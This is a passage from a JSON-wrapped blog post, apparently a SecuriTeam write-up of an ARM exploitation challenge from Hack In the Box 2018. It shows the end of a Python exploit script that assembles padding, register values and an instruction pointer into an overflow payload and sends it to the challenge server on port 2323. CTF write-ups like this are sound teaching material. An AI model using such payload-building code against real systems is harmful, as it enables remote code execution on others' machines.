id=\"crayon-5b2d75d984430317233438-61\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x68&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\"># this will make it crash, used to check register values<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-63\"><span class=\"crayon-v\">n<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">128<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">38<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-64\"><span class=\"crayon-c\">#print &#8220;LEFT &#8220;, n # how much shell code space left<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-66\"><span class=\"crayon-v\">tous<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Belong to us!x00&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-67\"><span class=\"crayon-v\">padding1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;B&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tous<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-69\"><span class=\"crayon-v\">padding2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-70\"><span class=\"crayon-v\">pl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ch1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ch2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">tous<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">r2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-71\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-72\"><span class=\"crayon-c\">#this will make sure we can encode\/decode the string as UTF-8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-73\"><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;IS OK &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-e\">pl<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-74\"><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Sending payload n&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">pl<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-76\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create_connection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2323<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-77\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-79\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">recv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0077 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3694\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Fri, 22 Jun 2018 11:30:44 +0000<\/strong><\/p>\n<p>During the event of Hack In the Box, we launched an ARM reverse engineering and exploitation challenge and gave the attendees the change to win great prizes. The challenge was divided into two parts, a file &#8211; can be downloaded from here: https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10 &#8211; that you had to download and reverse engineer and server that &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3694\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">beVX Conference Challenge \u2013 HiTB<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10756],"class_list":["post-12656","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-conferences"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12656"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12656\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}